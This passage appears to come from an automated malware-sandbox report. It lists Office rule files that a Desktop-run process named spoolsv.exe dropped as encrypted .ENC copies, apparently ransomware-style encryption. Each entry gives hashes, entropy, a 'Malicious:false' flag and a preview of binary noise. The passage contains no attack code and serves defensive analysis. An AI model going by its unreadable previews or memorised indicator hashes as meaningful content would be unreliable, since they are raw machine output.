                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......N..Vo...z.h.....g_%..T.\......j .j.5B".....6.D\f".....2i-..qD..#.e.T...m%.........k76.dU..5Q.:|C.....$c}m. ..h.3.7X.\..~.......ml.........e..~.E...?..+.y}.`...Z?C"..P......h..4f]U` r.N..B..v R-...J....b].|;.a.ra..R..juZ.=)cw.....H..G....u..$....CX.N.FG..K...n.]..........4..B...V.K.2.Z_._3Qu.orX..M..2G.h..2.c...o.V..._8.p.9..b......e.pig.Q}......i.f"..ly.......9g...^.1.P..#.%4a..!E....}?D.i..EI`.g^..6.=..e..j..,...N@...DVA.e.{bK..%P.a..5.|..t...GI.Q.@k1C.*t..c......:Z....<....,Dv.S..=.G....R.2_..,.W|...pE..&.E...:..B?,..22...;`.F|...).;/..<0..a......`9.q...Nm.). .z._..!AB..L...T...b>.76.....Y|......I)....1..Y......o@Z../.....(3.......n..?..HA.?.Hty3....?.,;..%$.....hBNp.x;..U:..<FgB.o...A..E..]..=.........n.{.....5...WZ.o4..o.....V.I\8^.....c.Z.OwG.,.:..`.P..PR.D(G.+8.SJ.A.3.l.2.]1.2......L@.6.....{C...#...........{...ME...Q?5....C*...Y.=.........BN..9(...G.O.)*....C%...!b..hP..A.t..z

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703001v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.868496098777736
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+8ijNJBY5A3Q4yyRoJMsmQ/d8jjcd5kdcx8lB7yN3wBzE64JimFLCrJe09ebtrgJ:+RjNrXg4yAspd8Uzk2x8l4u4JDArabtq
                                                                                                                                                                                                                                                      MD5:C5CABA20CAA0A922602B76CBF2C5801C
                                                                                                                                                                                                                                                      SHA1:25423CC9A9D3B97BDE578830F89B8594E1EE966B
                                                                                                                                                                                                                                                      SHA-256:927BCBD088248A6B60E3C7013B8FCF86AA6B3977E81DFC1A207E5B6F8A70B04D
                                                                                                                                                                                                                                                      SHA-512:B5F9BCFDD0E247331485113BC061CA5EC6FF425EDD32D1FE43A1ED81F11632FD88F2D631129398D92842596B67AE4139BF9E509C0FC65191AE863624B3F37C4F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..Q..kh..>.ov........H...!....K8.P=7.G......Yr..tG....SQ....nQ.....PH/....q.%j.....Kx.E:...)..6T.,N.8..h.3..e}..{..`.2.h.'....}.(...........n<.u..{2./.\.Z.Z....4...*...(....6.N....rv.. -.@.wI.^..L.......H.V....u.}!.er...y..z.=....3....+.....d\M....B.Y.W.....q.[0.*.R...>^.Vm..).XZ......N4.0=1.mum3..v.l...}QE+...... I.;.u...jN[.`{....Op.<....q.g..G.....B.%d.(...W....H.Ce...UNF.o\A@...z..{.....~....F,.{.(.wUz..6..U..)....9..8B...{QG....f..].W.+\K....2.a..W...|.>.T..a..g.J..A..q.....J.._.[..j.2ni2.I..:.....Y.........n.......+...G...?u....."rd^..#F...}"N.vA.g..S.......8.M..;B....QU...*..r....`B.v>...."...A*..r.)F.:.......6".zZ&-."....V..O...".>.... ....@.uxUbep.."Q.b.-..&...}2+;Y.........1.z.n.2.(l..D.qdm....:.a=.(.....|.../}....k.l.'...)Z'1.X.:...3w].D......{.`K\#'.b.bH..P ..~..~.S....P..1.kt..k0Qa...b.D.%.}.._.V2..*.g.l.....u...........N...j...z....=y."+........6.......q..*.S....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703050v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.857137455700075
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+E1EqlvTlT7Gnu6Beotc9YzR0BP6IdmdxSAjdwT1Dfd9ifi8yXjxKRw:+EhlvTBEu63ZNoPedxrwTZ7gxyXoRw
                                                                                                                                                                                                                                                      MD5:E4470F8D43C5C5B7561FAB44CC05E406
                                                                                                                                                                                                                                                      SHA1:D5106F1AAAB3F1F091BE46E6FE11CDA0C3F2C957
                                                                                                                                                                                                                                                      SHA-256:516765690AA28B1DAA1125FEB8B7DDF43BF2C9F322161C4CC905129E6F27DAB8
                                                                                                                                                                                                                                                      SHA-512:2B2B7828CEF3CF0B7BC964C8DB317AD2B24462C16768F6266FA30B4A6D83895E946D7BEF7F373AA82754868EDB0323E0A11BE709CF844048DC578577E71100B0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...i.7..!.X...!C.V$..9<...E.(.p.f..N[6.HX..R...n..UW.9.Z...5.Q..KlT..:......Pn.!.a.J*.o...v,^..^Y`.V.]s.x....x...q6..w........>M.~.>.r......1...`3....l.."...we3^<...`h!;..i...>%..z...R..{,e..T@.]..r.tg.......I.K0k}{..i.......T. ..=...Z1Kx.M.,..Rj.$<..(...Y...a...L......Zh..K..f.GE<..X.B5.Yt.uI......L..[}.fu......|..s<.N.?...........x..Ya.Ea,.m.MR.*........4.B^.@.....ql.....kH..]..&...........S.G..E...e/..~.>P9.....D..X.1..1..E.h.._W$*$..-..F.*..A_F..%.i...W{.yB....aW.?....6...........xO..G...%*...)I....2......H.T..s..._b7|0..%...b>.`^b_0....:k,..^{.b1{.5)....2.R..bn^D]W..?.....n\.7.v..w$.XxQ;...O._.}....z9..>'...[..p..6...S...D.i.1.$......\..x...&r..[@.)X...B.#...B..Rp.uv...gW...?.>.f.....%%...?.....~..s..p.zl..........uc......(......e...@5.:....c..*..Z......V.W.M(-._w%....sM;..x5.P.e.....-....@X$s...R.........'A.+.s......F..q..s.....a.V{...U..5.T.........../..2...j_.[Y6O...W..j...09...6.........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703051v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.847745377170342
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+k0aL9ypsqnuLVArjrHmqfP6hOnJg7yw/Ig9+/V1EBsdG+h4zSWG/KOhJ3K:+kv64VArHmOCEnj09+n+s3kOva
                                                                                                                                                                                                                                                      MD5:D479DE77F4512C81F57A97522C0576E0
                                                                                                                                                                                                                                                      SHA1:8467AF2F133DCF8ED1C6F33FFD8CA7F50E1D099D
                                                                                                                                                                                                                                                      SHA-256:C6F9080A4B25518101D0E94EF7B70E56CD4B1A7480EEEF50191EC5DC5451155A
                                                                                                                                                                                                                                                      SHA-512:E1244F1113CE41A74E982C0EA3B43EF2D262C464FD2F6A720BC6D0482EED81295016BB91F0138AF48AA3AC5C1F3DAD3027E27E0895FA1EFAD762CBD228F7D27C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.#W|Z....t......!...C......9....-.....z.n..!@..V....h.Q..kF.ph.\....i....*j.^m....K.i4.M.....p.....Q.\L.HU...X2^[..DOJ.eG........*.......A..%.....1..6..o..2.....(..U>...6\........M...;0...%.c.....}n....Z...:.@ur...<9a.!.....\P...J..%...2$..l.(....\...{...8.EQ.`.VB..*.....S..K0].&.t..........T..NM.3..mJ]..{........9..0%.<.....P?...?..o.....'.,.A&K.....d.i.M..c*...Oa..P.sQZ..`.O..X.\.y..c.tD.{<.Q.{..* @!..l`.1..."&....1../.~._...~...D.0.&z..N1........*<...l.,......jR....9....J.../.`.:Z..H/.....!..j........c,..W.z.R;. ......f...eXR.^.O..7..a*W...?.....;.(M..NR.D.xU.._.y..^7.R....n.h.ZP.}.]yz'.Q...Pb...#.E...k..tT$......;t.OI..\.PH1..#s$y..UR%ic.....'J~...5. ....C.....lF.. .An.......V...v....l.1..... .H..|..S^'I...?.>.\!.....!Z@O@.".>....'...-..b..T.b....s../...W.\..]m.n...9......b.../..G...<m.\.0...<...[..b..7@........W."..P.+/....2%...JfgFs.W.4Zt.....H..E .Q.{,...0.8......,.8H6...?`...%).

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.841957406778636
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+m1dcsWnYzy9QHz2s/MCmjYDcnfZEucRkM8OOdPw5WF/H434kgGRqYoXO3FRct84:+mfcuuQHz2sk9CEBEuPpOd7gGRr1VRCt
                                                                                                                                                                                                                                                      MD5:CCDF81170B4D7C442FA711D9DC4A5DD9
                                                                                                                                                                                                                                                      SHA1:7A72C28992E72C073273CFF542BE4AA3EF991635
                                                                                                                                                                                                                                                      SHA-256:D3FDB96810ADC629B003AC509E6CBA9A11CAB096645557F61AB7834AF9FB73C2
                                                                                                                                                                                                                                                      SHA-512:2EC38F7785C2CB345393CEC385C325ADDC296371BC6374D09EDEE149ACD54CEC186A7A626D71A3E6FC9AEB1E6F93A90159B80E5D47D30B8C75B3BD233F388170
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..!.........x...Gw0..d.....k.....&7'..D.{.^...F.,...,Mk....Re.:....x.L.....@...5.D....8.2...O.e.....CQE@Q(.d.]Y...s..e8.Z5wT.tQ\..M..._$$..q.}.]J.....Ic;-WH1C^.y_...^.t."..DS.....=..?.....T..-.s0.u5....0;.M....(..}*R..{...[..;.......R....!.&M4Q6.....D..s...0..R....^...}0(.]....y.9..<.A..1u.`i1.l.....% ....t.!.5.u..@...>...N.S....{..^..,.o..H... c&.-....D..h..C..b%..z..A..S.N...66H.E}|C.....0...~.$.eT.....$......m.......O.^k.-..Pg...)....28.i..b\.w..`.c..eN./AO..H......{\...........6.i.Iw'wR...o{.@e..J.$..)Z..4.1E..j..OLo...U.y~....8.......V..J...t.QT........,.z.B..#..hA.5...g.`70.V.Ae&...].F.g2....51..J..r.T....L2..Q.m.7.-a.a..Cr.+ .<....4F.2.@C..O....@.u5j.U....e.>...u6..M...-.0.]Y.e.I..v......h..6.......%:..v......@Ie.....{...:....../{[....5..G.Oj."......^.R...N...L.~].I...Kqe...d...5..;...L.`....b~-B}.+_.(].O.?.w..V..r......9.b...N.&l@.b....4M.]......[.|..VHa....D6.F"W..lI... ....F..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.858800831083735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+QyuDcvQmCM6NPvdAjzkEzchDsTOqF/b3l9enUPlMJ41U5kCSi:+QyuQom16N20UchoTlVbeU9MrT
                                                                                                                                                                                                                                                      MD5:8229F400AEBC93C2E25995A85F753BE7
                                                                                                                                                                                                                                                      SHA1:997DF22D7FD3B701B39DC979D8E3ADEBFE47FA92
                                                                                                                                                                                                                                                      SHA-256:EC189B1D2D4DD88F0947850A21E52AD748D1833E122B121E17E236A7CA95AABD
                                                                                                                                                                                                                                                      SHA-512:3873A99036C6B328E351F7C3E2E2C9DF5C2938F77B47D857D64AE62F6EDA24631F3A2C0EFCBA6B685667D42684298D5A2B7A6808D75A610EF5527EF4C09AED2F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..W...b.y.O6!..x1...9..8.6e.../Y.....#......V^J...n.dHPn.y..CW.%g....I_...x...2.puM..O,OV...5.....h,..2..d..ET..S....@..).l..`T&..I|j..1..m.aTu.............E./...T......5.7....@....n..G.1|...x.......x..{.G..."@h.....Ghn...GX...ug.....,._........1.3>I..]ge..R...-Uk.\.6K.J.+i...a&!X...+......i.N4".......L.I;b.!ru{.-H..:.x..Q.i.j.15..h.;..6...X.Wu...1....B-..tm..e...KE..X\S........Se..J.1.j.^.Y... ......jneR....*F.........flV..2...\.|{.7....-.Q.=......|.`...5SG..........l.0.....X._...}22.....+.4..q.+.........1Q7..=..:..2.P...... G..<{.cC.N.....X........-{..i...A3.$ye..eM}RnHM....Qb..~Gr.....`..... ..Y.jj.BMc....(..../.\...Y..Sq.sQ..@..X.O.E.i.8....X.....5.....F.`.+.#..P...3S.p!6...........+<Y..@... ..K|.6..O.v.x4..ix1t.5fw+.o.'..i...xEj..*K......X..+...oDU....'.R>H9B/..im.+w\0...#..H..N..kP..{..h...T`.Wt.B.....p.....s..G.y#....e.&.}L:h.$.7,....C.......c.2......g.8PO...F-....3T.<......x*...d.N.m.p..bo_

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.850438193824529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+/vpgHEtdjANWLNiLWUI5XHiWMjjQzZaWWZXnB7ILlzqOeLQgYVuuo:+/vpRjAEhiKzSWMjqaWWZXnB7IL1qOeN
                                                                                                                                                                                                                                                      MD5:5AC986DDAA8612B6D1ECA09BB9CEC6DA
                                                                                                                                                                                                                                                      SHA1:657DFA2B69B809570E74709B06592A386A9ECAFC
                                                                                                                                                                                                                                                      SHA-256:F1D4616F4AE204A4DBABD37C2BE246E91F74DB0B68F1D0C0F38F22B9B58A22A1
                                                                                                                                                                                                                                                      SHA-512:5D83DE6DD8DAB6A45B7506274258094C6A7362D27F5AC91A4AD5454CCD9A2CA498CBB36DF727559705045E9048AAB1068D5B8184F50ADF790DA30B43476C6963
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..yTU...NY.ZI)...-....bNW1....sqQ...#..P]..(.D~......4oT...^....h).."..7....3I.A..*xc..8l.,.y..",.|%..s.~..%hH%b8.N._...T.H.Oo..\@....k.....B.r.9.kg~..Ie..J..K...p..-..q.(.N..0.).....`.s-$..Ylj..Cm_%..b..?.#..".....(.E....X`.-......?#h,.</.;..|.[e....J....~h^f.d.e.-...8LY....9..u;L...vF3.r...).7.AM...[..]..h..._)T...<Lb...)..M?.n."B:......ig#..)4F...o.Z.u.+A8.-.a......".h..$.o.E.Z......|..<(o.....>..G-....V+.....X..o.I..7z.h..d,As.v.-R1...wSU.fX__.u;.m....W$.Bh.....,r.c.c).n.....R.0/...g.}.........{..#)/3..+.Q..[..YA.BQ.0.MWU.F..+....-.u....Lc..w...<...g.....7].m<....6,...S)^p.._......nA._..Y....l9.2.s.....}V.?L....m5...(h.x.a;.......1.M\V..}t....SZ....n..07".=.[.....b...Q.J.n.-.p./#.7,R..d..Pr....X9. ...|.. ....{&.R//..YhS......m...M9;}t.........{.~.q..Y.[Lg......I..,@../...0.v,4..5.6.}.I@....+..K......I..c.%......4..aR...@.....G e..T....I...z.4......z.h.}f..).f.-];.p..X..H<k{....B...H7.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.87021029462693
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+ZfJVc+iL5uzIv0GpGzJzvnh/yz+5ozaUTjLODRB60mZ1Chy3a1EeUbc7ad:+ZKk8v4z1v8wozaqLODRB6xaaPgI
                                                                                                                                                                                                                                                      MD5:9FFED6DAFC1E41CEDA32172AE2267D01
                                                                                                                                                                                                                                                      SHA1:3AD596CA06BB75330F50124BD232087652C25D39
                                                                                                                                                                                                                                                      SHA-256:559ECBB56C91A59B313F66B9387D1F5812B0E627AFC2D717B491DD1550EA5A5E
                                                                                                                                                                                                                                                      SHA-512:808CC12667079A2DB6998C622F8BF563F9F9957C50987A66EE53045E1D84C21C8F346B74522BC4EDF597F450AFBC34C6AF07BC643ACB3C028CA0E1934DBC63ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..k9.9.v..V\.k.....n........{..D<.}[.. .....4..'t;.P./...h.X.....6.....Dvr..LC..T......SQ....(...wuy.o.e..w..!.h.l....}A..u.7.y{{.....(....y..Q..NO-Cm.h.?.Oj.80.........J.,k."#.E1..p..aY/E...P..m.bK.U..+>....@.,.-.>.$wb..mx.8.....+..k).o./...Z..dZ.uB..Bi.#...4...4 .......|.|..l..[`.o0r9dup...oZ.#&&".ux.N.p...{*|9h.....=.........Z.lKF4G."...C]..]....@.*.....w...D.eB..u.E..:B...........wK.`..!LXa.h.....z...?g....%>bm..{ .ZW...@.y.3bW.@\..H.,...O.wx$m5..C.Ye.]3..{.?v.N...W.{j....f..B.......(..C.0;#0(z..j.._.kH.?..G...e?........SP...j.)d}.$.....%3...E8H)_.z.~j.N\.$..D...W..../.1l>..I9.W.=.^.sXI,7.d7.zU.........K....7...P.h...N.eB*8.C..MzB.\c.-+..B....L..i.M$.5y..SS..._...yvp..`8n.=.\..l.z..7-.......+k.cW.g.%!.XE.:.ge...h......^..K..[..c...J.q#..I.[.......o..i2..........x.8...m.N&AWY&uh.-..Y..+....f.7.Q.m^..y.....;.e.^.!<.<..k'P.t..(.._}.v.b.2....(.7>#..._72....p...Y~..~..j^..f.ySy.Z;t.9KS:.......H.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.863243747790832
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+HLsRAp4e2j36Yh+daFOb648WU/WAjJ6yoIGny4yX/U3IiZWDaUAknzSkeeA21+y:+Q6p4e2jqxsFoFUeAJRoH6/UvZ1UAQZ9
                                                                                                                                                                                                                                                      MD5:ACD5DD41B3CE75937F9E250A19789593
                                                                                                                                                                                                                                                      SHA1:6F19E8285B1A0D6A6FC2DE1C444A54EFC6708903
                                                                                                                                                                                                                                                      SHA-256:6600518C975009964595269CADDC3D07DB0A46B6019E36EB56F05FBEE42A6273
                                                                                                                                                                                                                                                      SHA-512:BAF3994D7CC5FFDD10B4A4FE2D0BA3C5ED066606B73D3B3C26D0DBC37ADDDC9757ACA242AB4DC698907DF82202185BBE4D4328AEB7186797D9E36D3D32281ADE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....`G[h.....,.........A.y'........>.Y2vF.#.M.?..f:}.Z.,...J.P..#L[/a.%U....%n:.D.H..b........."h...Cr..qx...`...j..z$h/&...!...~G...%....K.......^a.,$....B.q2 ...uI.T|..3E.a.Y..A..6...........y.<jt.....#.F.Z.&Vr.:.d...a...]=g70*?..T..jC.js/v.:.P^..].."..h.V...."S.-4/u..U..W.!.c...R....e]...XJ...&...~_......Ic.P7W..G..L..[..N.=E..r;y....c...._;J.**@H.kbuC..t.Z$..c.t..............1...L....Q...#...{.$y.|..$[...~A..m..A@.......=m.)...!....D...K.3.OA.I.@4^./.dP..=#.6.n;Z....J(u@........8..ad.. \-.#.[U."..y......:.$b^.w....j..........xg.I..8u.C.}....'=.9.g...r..l..+......./^.} ..).r....;.....7D/...D.o...........-H...;..?.....U...'z...1.6&}[A...Zhe..I#..m.K;..-.<...K.........z..S.et.....6k.%..3....`...,d.V..W.b..]b..[....tof...C~..k,,.......[o..Q..G..:..f.&.B..'J..M........xGT...q...8(vl'....&FL.M....,!#_....&...i.l.............u.[.q.#.....&..%N.....P..8.'.....$1.t....^.{.....9.Jem.im.w.....9*}...,R......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.855126139833628
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+K40W/mkzJo/gHTgdYgdRjL8mWtRGVrHXHsGNoDcXhNF+UIcz4I0PS4GGyMjCa0i:+K4PnQEgd9LdWtRkrHXsGNoDEhvoe4zH
                                                                                                                                                                                                                                                      MD5:8631C965550DB737FFED17EFC8107C63
                                                                                                                                                                                                                                                      SHA1:A993D5B40EC4C2289833D3523C5B18F1C190C03A
                                                                                                                                                                                                                                                      SHA-256:08DE07CBDE04043A65D31725F3F0400B019D328A2A3D3C537A791FF6A9777F25
                                                                                                                                                                                                                                                      SHA-512:E3F6083EF5E60C58BD957151590BFCF7EF9F373CF988326B725D0A146CF8132C4BD6E180E6987943AB3CB5BF47D46D9CB4624CA931F5B5218B1902BAA537901E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.]P.:T..0.r'...{z|.T.5..(........O..j#p.k..mI.. .6.qC>..E..l..k{.....:.G.+.@v.h.b.gPn......Jek..C.0..W........855.._#a.#.....;.^...8.C..h.7..}A..2....|x,.8.O.....GFd..d....N.~.B6.z.>...{|.Bl.i.pT;d......Z..Q.AWr..#.5.z.....B]......j.3...l&y..u.j....p...^.....FN..Ic<.l..:w...I..Z..>..jC.....o..%..i.f.....8`.....4c..a........M..45 F.:^.e...._0...a..@..;...h..../.....=.WY...Ca..-f?..(....f)|.....Y(k.....I.*.O...E.H.o:'....u.C.=...6u.2^.C.f.Wt8.....) ........G.v.5..?|.),mZ.&[4..w..C..?:7.0.....w.F..~.'.....v.,n..H.TF-.?C.[N(..Fu .y.aJWb..C.W/.#..........s..lOG.h......E..6...eW....A.-w@....a9..qYY.'..e#M9.......J.#p%t..=.n...4.1n..2\.n.. m.E._........0..k........A_.0....VP`.'(.-.0...7.X&.S...._..9....F{l..@Zi......8....Qq.l.R....>JL.&..8....!X.......e.yA.qk1..HK.H. ...y.F.N.M..'.....+nK.?.#[z..D..=.........Q.z,....-.o}8..;DFH.z..>.@..........l~B..I.].}]..*7...C./.jJ....g...e....c..`..{

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.860959047260332
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+XYVeCe0NBNDXa3kDHk/0l52xH7kkOzTam789ulq7a4COe/HrwpTx2XbLedd:+oVcU/W0DHe0lCNOzT98Yl8aZvvrwpMY
                                                                                                                                                                                                                                                      MD5:8795B6B4BF4EFF4C5B1EC9C8BBECEDDB
                                                                                                                                                                                                                                                      SHA1:0ACC3CFEFCD335E0F8C43A201DE65F5862D80C32
                                                                                                                                                                                                                                                      SHA-256:FA107FD29997B0CB2DD09F3C3CB0C85DBE4A0D7AEA41FFE3F3001CAC79B0E06B
                                                                                                                                                                                                                                                      SHA-512:F7E06EC4F4FC4DFB711949F99D943C83F95C000C7F50EA0957E74BF95B41B855CA21D41D23108C5A273CCB0B158FFCD3FED5226DFCF78CA1D0570F3DBC17F4BD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...F.+P.&Y...zm..G2f ?n..f.9.,`...t..Kl..`.....%.TA.Z..U..KD.D*.O.f..XK.a.c...q..2.i.9Mq...m#.W.G.b....M]...AW.Io..$.....JF.kZ~...>Q./..JE..........dh..K..H#A.[..!..Gl...g5....-2..+..P..wq.k..5...P)...w..WX8@.....A..%.)3.n....0n.].0@..|../.+.t|.!..j.;*.$....2m.s.u.9...l..."@.W{.c.b...M...1K.G3MJ......Z...0..H}.....T...K...'+}.b0.s....FYC............9.+.(...1;.-IB..x..x.....V.?2./)F*...@......l.Z...!k.......`e....,.$E ..j!e}^.(-L.....CG....9^@.+eF.q.......b.......RU..".......n7...>G..0.MY,.Q..{.pH...>s..j..o.^c...R4D1.B_....R.0KD ... .<.V]...e.Z..Qp0.tZl.s........d.pJ..$".B..]b...L........+.y...R.e/...YU.U....x"...k..l$'.h.5j4.....2.m..F..e..E.....Q.5..........b.U.j8..:....?.B`...A....*uA.U4.&kg.../....6..'W.KJ.W...;,..XWq.K.-.l0../..kW...L...f.]R...S...d..H..@,n....m.ia..q....d ....\hh.....&...`+..l.......g<...R.z.qZ.*...v\.Z.S..~..J........j..&.88....G........j...dL.9+......_.$Vl...^Y

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8628597296133185
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Dh4Fsd4HgrwO3koVo8tJYRE7x2JlzdCWKDujrd2xp/9wkSNwv:+V4FQ4HLl57REx2jxCWKDufd2jjSNu
                                                                                                                                                                                                                                                      MD5:C32B084826C744587C8B50F7CCC1F2C8
                                                                                                                                                                                                                                                      SHA1:92D7A91DD349FC1981B672016C503FED379FF942
                                                                                                                                                                                                                                                      SHA-256:156CD403D7BB03D3FE5CFFF31264016C8744C027077450B5CF76CEB9E819E147
                                                                                                                                                                                                                                                      SHA-512:4ADF92C158CEB1F712DA125C2D96B1599ECA52CAD294EC1879DA60A5E6173A94B4803CE14B5033DD4EDA9C8152C41255C0E573A184C7341A43F5BCC5CD7D96C4
                                                                                                                                                                                                                                                      Malicious:false
